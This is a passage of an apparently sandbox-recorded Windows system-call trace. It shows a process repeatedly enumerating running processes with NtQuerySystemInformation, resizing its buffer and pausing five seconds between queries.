SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.527] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.550] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 